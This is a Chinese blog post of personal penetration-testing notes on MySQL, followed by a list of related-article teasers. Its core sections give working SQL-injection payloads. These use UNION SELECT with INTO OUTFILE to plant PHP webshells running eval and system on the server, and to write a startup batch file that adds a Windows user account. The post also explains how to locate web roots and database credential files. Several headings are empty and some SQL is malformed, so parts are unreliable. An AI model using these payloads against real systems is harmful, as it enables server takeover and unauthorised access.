渗透基础之MySQL学习

最新推荐文章于 2023-07-31 11:30:00 发布
最新推荐文章于 2023-07-31 11:30:00 发布
阅读量343 收藏
点赞数
分类专栏: 笔记 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_49091880/article/details/115398862
版权

一、insert into admin<username,password) values <'admin',md5<'admin'>>;

新建插入一个用户名和密码,密码采用md5加密

二、修改密码

 

 

三、删除用户名密码和账户

 

四、查询当前数据库版本和数据库类型

 

五、mysql函数定义

1.system_user():系统用户

2.user() 用户名

3.current_user 当前用户名

4.session_user() 连接数据库的用户名

5.database() 数据库名

6.version():MySQL数据库版本

7.@@datadir 读取数据库路径

8.@@basedir MySQL安装路径

9.@@version_complie_os 操作系统

10.select load_file<'c:/123.txt'>;

#读取123.txt中的信息

六、数据库的连接信息

<?php

$host='localhost'; //数据库地址

$database='sui'; //数据库名称

$user='root'; //数据库账户

$pass='root'; //数据库密码

$webml='/0/'; //安装文件夹

?>

主要在Config.php、Db_config.php、include、common.inc.php文件中

可以获得以上的信息。

七.MySQL显错注入

 

 

 

八、获取网站根路径

1.报错显示

2.谷歌黑客

site:目标网站 warning

3.遗留文件 phpinfo info test php

4.漏洞爆路径

5.读取配置文件

Linux文件下:/etc/httpd/conf/httpd.conf

wiindow文件下:User/local/httpd/conf/httpd.conf

注:C:/windows/system32/inetsrv/metabase.xml

#这里面存放一些目录信息

九、写入函数 into outfile

命令:and 1=2 union select 1,"<?php

@eval($_POST['cracer']);?>",3,4,5,6,7,8,9,10,11

into outfile 'C:/inetpub/wwwroot/mysql-sql/cracer.txt'

十、利用注入漏洞执行系统命令

第一种:

and 1=2 union select 1,"net user seven 123/add",2,3,4,5,6

into outfile 'C://Documents and Settings/Administrator/[开始]

菜单/程序/启动/1.bat

第二种方法

and 1=2 union select 1,"<pre><body><?

@system($_GET['cc']); ?></body></pre>",

3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 into

outfile 'C:/inetpub/wwwroot/mysql-sql/cr.php'

[Python从零到壹] 八.数据库之MySQL和Sqlite基础知识及操作万字详解
杨秀璋的专栏
03-03 8160
欢迎大家来到“Python从零到壹”,在这里我将分享约200篇Python系列文章,带大家一起去学习和玩耍,看看Python这个有趣的世界。前一篇文章讲述了Requests库爬取豆瓣电影TOP250,并存储至CSV文件。豆瓣TOP250是非常适合入门的案例,也能普及简单的预处理知识。这篇文章将普及数据库操作知识,这也为后续网络爬虫存储至数据库奠定基础。本文详细介绍MySQL安装、SQL语句和Python操作数据库知识,希望对您有所帮助。
渗透基础知识入门(自学笔记)
woqusss的博客
07-31 3429
渗透,要学的东西还是比较广,需要有一些基础知识作铺垫开始学,而且作为一个刚踏上学习道路不久的小伙子更应该在学习道路中不断补充更多基础知识,如编程语言,网络知识等,该篇笔记做一些基础知识的铺垫,主要围绕网络知识(域名,DNS,数据包),操作系统,数据库,Web组成架构(网站源码,操作系统,中间件,数据库),Web相关安全漏洞介绍,拓展,后门,常见的加密方式 比方说,我现在想日了某站点,那么总应该知道这个站点是哪个名字或者有什么唯一标识吧,这时候就有了IP(每一个网络和主机都会有一个逻辑地址,在交换数据
渗透测试基础知识----MySQL 配置
weixin_59086772的博客
03-17 4019
MySQL 配置 1、创建mysql运行使用的用户mysql $ /usr/sbin/groupadd mysql$ /usr/sbin/useradd -g mysql mysql 2、创建binlog和库的存储路径并赋予mysql用户权限 $ mkdir -p /usr/local/webserver/mysql/binlog /www/data_mysql$ chown mysql.mysql /usr/local/webserver/mysql/binlog/ /www/data_mys
mysql渗透_mysql渗透过程
weixin_29133981的博客
01-18 575
1 打开目标站点:www.xxx.com2 注册账号并登录,大概找下注入点,没找到3 用namp -A -T4 目标站点扫描开放的服务发现mysql等4 猜弱口令 + 字典 对mysql进行了破译 (运气较好,得到了密码)5 连接到mysql 找到用户表,密码用md5加密,试了几个,解不出来,应该有加随机字符于是复制了一个超级管理员,用户名及密码复制之前注册的账号6 打开网站首页,登录,...
怎么渗透验证 mysql_mysql-渗透测试
weixin_30478241的博客
02-07 342
这里以kali 中的MySQL 做演示MYSQL 的账号密码放在mysql 库中的 user 和 password给root 增加密码update mysql.user set password=password('echod') where user='root';增添mysql 用户insert into mysql.user(host,user,password) values('%','...
mysql 案例 ~ mysql安全渗透测试
weixin_33825683的博客
05-22 243
一 简介 Metasploit是一款可以从多种角度进行勘测的渗透工具 二 使用 1 安装 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstal...
基础篇】渗透测试之MySQL部分
weixin_44200098的博客
05-21 661
渗透测试需要用到的MySQL基础知识
MySQL注入技术深入剖析与实战指南 - 基于sqli-labs的详细学习手册
最新发布
03-28
适合人群:具备一定Web安全基础的研究人员、渗透测试员、安全工程师等。 使用场景及目标:①学习和掌握MySQL注入的基本原理和技术;②通过实际案例和练习提升SQL注入的实际操作能力;③了解并防范Web应用程序中存在...
MYSQL基础入门:为WEB安全学习铺垫
资源摘要信息:"WEB安全渗透测试1-Msql基础" 知识点一:MYSQL数据库基础操作 MYSQL是一种广泛使用的开源关系型数据库管理系统,它在WEB安全领域中有着极为重要的地位。本课程首先对MYSQL数据库的基础操作进行介绍,...
WEB安全渗透测试1-Msql基础
07-01
本课程主要为后续学习WEB安全提供铺垫,了解...本课主要讲解MYSQL数据库的建表,对数据表的增删改查以及where,group by ,order by,limit等查询方法的说明,适合于零基础入门及零基础需要学习WEB安全相关内容的人员。
MYSQL高级注入教程
04-03
pczygx PC资源共享 MYSQL 高级注入 教程 渗透教程 第一课 MYSQL基础教学I 第二课 MYSQL基础教学II 第三课 MYSQL基础教学III 第四课 手工注入-联合查询篇 第五课 手工注入-MYSQL5.0暴库 第六课 手工注入-MYSQL注入高级技巧
MYSQL渗透测试
anan2175的博客
05-26 1029
部分来源于:先知社区 MYSQL-getshell篇 通过日志getshell 查看日志的物理路径(绝对路径) show variables like '%general%'; 打开日志记录内容 set global general_log = on; 重新设置日志路径(绝对路径) set global general_log_file = '日志绝对路径'; 写入webshell ...
mysql渗透中的技巧总结
ytuo1223的专栏
10-08 760
mysql渗透中的技巧总结... 目录: 0×00 mysql一般注入(select) 0×01 mysql一般注入(insert、update) 0×02 mysql报错注入 0×03 mysql一般盲注 0×04 mysql时间盲注 0×05 mysql其他注入技巧 0×06 mysql数据库版本特性 0×07 声明 正文: 0×
渗透第五课 数据库
qq_42048911的博客
11-20 369
暴库 数据库: access 文件形式data.mdb sqlsever/mysql(服务器) 找数据库连接文件 xycms类型的 后面加xydata/xycms.mdb 有特殊符号的进行URL编码解码 可以获取语法找到数据库文件 下载漏洞利用:down.asdp?FileName= 蜘蛛爬行 找到url 下载conn.asp conf...
Mysql注入详解
qq_44735563的博客
05-22 424
Mysql注入详解 1.防注入绕过:1.大小写绕过 2. %00编码绕过 2.判断多少列:order by xx 3.爆出数据类型不匹配的列:id=-294 UNION SELECT 1,2,3,4,5,6,7,8,9 from information_schema.tables 4.获取基本信息: database():数据库名 version():数据库版本 user():数据...
渗透测试-地基篇-数据库基础操作(一)
qq_34801745的博客
11-12 1204
** 渗透测试-地基篇-数据库基础操作(一) ** 作者:大余 时间:2020-11-12 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 名言: 你对这行的兴趣,决定你在这行的成就! 文
中北网安实训笔记-(20200623)-MYSQL渗透测试课程)mysql详解、命令操作介绍
tonyhapply的博客
07-09 409
下期安排: burp suite修改包中数据或者当做代理使用 A:access数据(Windows)SQL server(微软) B: Oracle(甲骨文)大型数据库 MySQL 社区-》商业付费 C: Mariadb 社区多人维护(免费)Kali Linux A、B、C: 关系型数据库 作用:解决我们应用系统内的复杂关系(内存中部分存储) D: redis mongdb 非关系型数据库(内存中存储,读取速度快,突然断电可以备份数据,比较适合大数据) MySQL之父 Michael Widenius 1
mysql高级渗透经验
cnbird's blog
02-25 1739
concat(0x7C, hex(cc_number), 0x7C) concat(0x7C, ord(substring('11',1,1)), 0x7C) concat(0x7C,hex(cc_number),0x7C) concat(0x7C, ord(substring(cc_number,3,1)), 0x7C) 加where条件 and(select%20ord(substr
渗透测试之地基服务篇:服务攻防之数据库Mysql(下)
m0_59598029的博客
07-31 475
渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用KaliLinux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值